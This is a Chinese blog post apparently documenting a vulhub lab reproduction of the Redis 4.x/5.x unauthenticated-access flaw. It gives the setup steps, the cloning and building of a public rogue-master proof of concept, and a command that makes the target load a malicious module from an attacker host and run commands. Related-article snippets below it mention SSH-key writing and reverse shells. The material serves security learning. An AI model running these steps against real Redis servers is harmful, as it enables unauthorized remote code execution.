vulhub漏洞复现57_Redis

最新推荐文章于 2024-01-22 16:24:11 发布
最新推荐文章于 2024-01-22 16:24:11 发布
阅读量339 收藏
点赞数 1
文章标签: 安全 redis java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122890065
版权

Redis 4.x/5.x 未授权访问漏洞

漏洞详情

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

参考链接:

- https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

环境搭建

靶场:192.168.4.10_Ubuntu

执行如下命令启动redis 4.0.14:

#docker-compose up -d

环境启动后,通过`redis-cli -h your-ip`即可进行连接,可见存在未授权访问漏洞。

漏洞复现

使用如下POC即可直接执行命令<https://github.com/vulhub/redis-rogue-getshell>:

1. 获取poc

#git clone https://github.com/vulhub/redis-rogue-getshell

2. 编译

#cd  cd redis-rogue-getshell

#make

3. 执行

#python3 redis-master.py -r 192.168.4.10 -p 6379 -L 192.168.4.29 -P 8888 -f RedisModulesSDK/exp.so -c "id"

 

Revenge_scan
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub】 redis
haoaaao的博客
05-01 1138
0x00 4-unacc(未授权访问) 1、介绍 redis默认端口:6379 Redis 是一个高效数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 ———————————————— https://blog.csdn.net/plo
vulhub漏洞】redis 4-unacc 未授权访问漏洞
最新发布
m0_59598029的博客
01-31 1034
第一次看使用公私钥ssh免密登录的过程还有计时任务反弹的过程网络安全真是学无止境。
vulhub之redis篇
weixin_56306210的博客
01-22 598
vulhub之redis篇
vulhub redis-4-unacc
jjjj1029056414的博客
11-18 255
redis未授权漏洞
cpp_redis:C ++ 11轻量级Redis客户端:异步,线程安全,无依赖项,流水线,多平台-不再维护-请检查https:github.comcpp-rediscpp_redis
01-30
cpp_redis cpp_redis是C ++ 11异步多平台轻量级Redis客户端,支持同步操作,流水线,标记和高可用性。需求cpp_redis没有依赖项。 它唯一的要求是C++11 。 它没有网络模块,因此您可以自由配置自己的模块,也可以使用...
fill_redis.zip_python_redis_redis Python
09-15
在Python编程环境中,Redis是一个非常流行的键值存储系统,它被广泛用于缓存、消息队列和数据持久化等场景。`redis-py`是官方推荐的Python客户端库,用于与Redis服务器进行交互。本教程将详细介绍如何使用Python的`...
channels_redis:用于 Django 通道的 Redis 通道层后端
07-24
channel_redis 提供使用 Redis 作为后备存储的 Django Channels 通道层。 有两种可用的实: RedisChannelLayer是原始层,它自己实通道和组处理。 RedisPubSubChannelLayer更新并利用 Redis Pub/Sub 进行消息分发...
php_redis各版本大全
05-13
Redis是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal...
cpp_redis:C ++ 11轻量级Redis客户端:异步,线程安全,无依赖项,流水线,多平台
01-28
cpp_redis cpp_redis是C ++ 11异步多平台轻量级Redis客户端,支持同步操作,流水线,标记和高可用性。需求cpp_redis没有依赖项。 它唯一的要求是C++11 。 它没有网络模块,因此您可以自由配置自己的模块,也可以使用...
Vulfocus-Redis漏洞(特征识别+自动化测试项目)
qq_68064663的博客
11-15 553
Vulfocus-Redis漏洞(特征识别+自动化测试项目)
redis未授权访问漏洞vulhub靶场】
m0_55854679的博客
08-01 718
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
Redis Lua沙盒绕过命令执行(CVE-2022-0543)vulhub漏洞
qq_53003652的博客
08-04 148
攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。启动后,使用redis-cli连接服务器。Lua中执行这个导出函数,即可获得。Lua沙箱中遗留了一个变量。函数来加载动态链接库。连接redis,使用。
SSRF——weblogic vulhub 漏洞及内网redis反弹shell
weixin_43774222的博客
03-17 6457
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实
[Vulhub] Redis 4.x/5.x 未授权访问漏洞
weixin_45605352的博客
07-16 2687
0x00 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /roo
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞
ploto_cs的博客
09-09 1385
Redis 4.x/5.x 未授权访问漏洞 1.redis介绍 Redis 是一个高效数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 2.适用类型 数据库版本在4.x/5.x以下 3.预防措施 ① Redis添加密码验证 ② Redis尽量
Redis 4.x5.x 未授权访问漏洞(RCE)
网络安全。
02-14 1389
0x01 简介 Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 0x02 漏洞 1、环境启动后,通过redis-cli -h your-ip即可进行连接,可见存在未授权访问漏洞。 2、使用如下POC即可直接执行命令。 工具地址:https://github.com/vulhub/redis-rogu...
Redis 4.x/5.x 未授权访问漏洞
roukmanx的博客
12-24 1326
本次对Redis未授权访问漏洞的利用过程做个简单的记录。 前言: 在2019年7月7日结束的WCTF2019 Final上,LCBC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,这种利用方式更为通用,危害也更大,因此来学习学习 https://2018.zeronights.ru/wp-content/uploads/materials/15-redi...
from django_redis import get_redis_connection 波浪线
07-10
您是在问如何导入Django中的`get_redis_connection`函数吗?如果是的话,您可以使用以下代码将其导入: ```python from django_redis import get_redis_connection ``` 这样,您就可以在您的Django项目中使用`get_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值